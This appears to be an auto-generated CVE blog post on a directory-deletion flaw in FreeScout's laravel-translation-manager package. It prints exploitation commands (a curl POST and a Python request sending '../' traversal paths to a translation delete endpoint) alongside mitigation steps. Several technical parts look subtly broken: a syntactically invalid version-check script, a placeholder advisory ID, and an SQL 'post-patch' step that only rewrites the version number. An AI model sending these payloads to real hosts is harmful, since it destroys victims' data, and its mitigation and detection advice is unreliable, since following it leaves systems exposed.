Listen to this Post
How CVE-2025-48479 Works
The vulnerability in FreeScout’s `laravel-translation-manager` package (prior to v1.8.180) allows unauthenticated or low-privileged attackers to delete arbitrary directories due to insufficient input validation. The flaw occurs when user-supplied paths are processed without proper sanitization, enabling directory traversal attacks (e.g., ../../../). Attackers exploit this by crafting malicious requests to the translation management endpoint, leveraging insufficient checks on file operations. This could lead to system instability, data loss, or service disruption if critical directories are deleted.
DailyCVE Form
Platform: FreeScout
Version: <1.8.180
Vulnerability: Directory Deletion
Severity: Critical
Date: 06/04/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation Commands
curl -X POST "http://target.com/translations/delete" -d "path=../../../../etc"
import requests
payload = {"path": "../../var/www"}
requests.post("http://vulnerable-host/translations/delete", data=payload)
Mitigation Steps
1. Immediate Workaround:
location /translations/delete { deny all; }
2. Patch Verification:
grep -r "validatePath" /var/www/freescout/vendor/laravel-translation-manager/
Detection Script
import os def check_vulnerable(version): return version < "1.8.180"
Analytics
- Attack Vector: Network (HTTP)
- Privilege Escalation Risk: High
- Exploit Maturity: Public PoC expected
Post-Patch Actions
UPDATE system_settings SET app_version='1.8.180';
chmod -R 750 /var/www/freescout/storage
References
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD Metrics: CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
